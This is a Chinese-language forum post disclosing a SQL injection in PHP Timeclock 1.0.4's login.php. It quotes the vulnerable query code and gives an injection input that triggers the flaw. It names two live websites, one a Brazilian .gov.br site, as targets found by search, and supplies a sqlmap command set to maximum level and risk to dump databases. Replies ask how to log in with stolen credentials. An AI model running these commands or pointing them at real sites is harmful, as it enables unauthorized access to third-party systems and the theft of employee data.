PHP Timeclock 1.0.4 登录文件漏洞 [+Exp +PoC]
昨天帮朋友看了下他们一直在用的PHP Timeclock,说是最近发现了很多audit日志。去google了一下,在SourceForge上找到了这个工程,下载朋友的那个版本1.0.4 之后开始审计
工程官方介绍:
PHP Timeclock is a simple yet effective web-based time clock system. It allows you to track all employee time as well as upcoming vacations and more, it can also replace manual sign-in sheets and such. It is written in php and utilizes a mysql database.
====================PoC==================
登录发现报错(login.php):
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/html/login.php on line 19
查看对应文件代码发现问题
if (isset($_POST['login_userid']) && (isset($_POST['login_password']))) {
$login_userid = $_POST['login_userid'];
$login_password = crypt($_POST['login_password'], 'xy');
$query = "select empfullname, employee_passwd, admin, time_admin from ".$db_prefix."employees
where empfullname = '".$login_userid."'";
$result = mysql_query($query);
while ($row=mysql_fetch_array($result)) {
$admin_username = "".$row['empfullname']."";
$admin_password = "".$row['employee_passwd']."";
$admin_auth = "".$row['admin']."";
$time_admin_auth = "".$row['time_admin']."";
}测试报错:
Username: exp'
Password: Moreexp
可触发
========================================
用MegaEXP搜索关键字找到几个demo,测试了一下,其中有一个还是.gov.br的,不知和zf有没有关系
http://www.quecomputersmankato.com/timeclock/login.php
http://www.pontoweb.ac.gov.br/login.php
===================EXP==================
目标地址一般为:
http://<target>/timeclock-1.04/login.php 或 http://<target>/login.php
检测漏洞存在后可用sqlmap跑
sqlmap --url="http://<target>/login.php" --data="login_userid=admin&login_password=moreexp" -p login_userid --random-agent --level=5 --risk=3 --dbs===================== Result ===================
一个有效的测试结果展示
**** Hidden Message *****
到此结束……&
O(∩_∩)O谢谢!!!!!! 有uid和md5可以登陆吗 谢谢了 研究拿走
我就看看啊
页:
[1]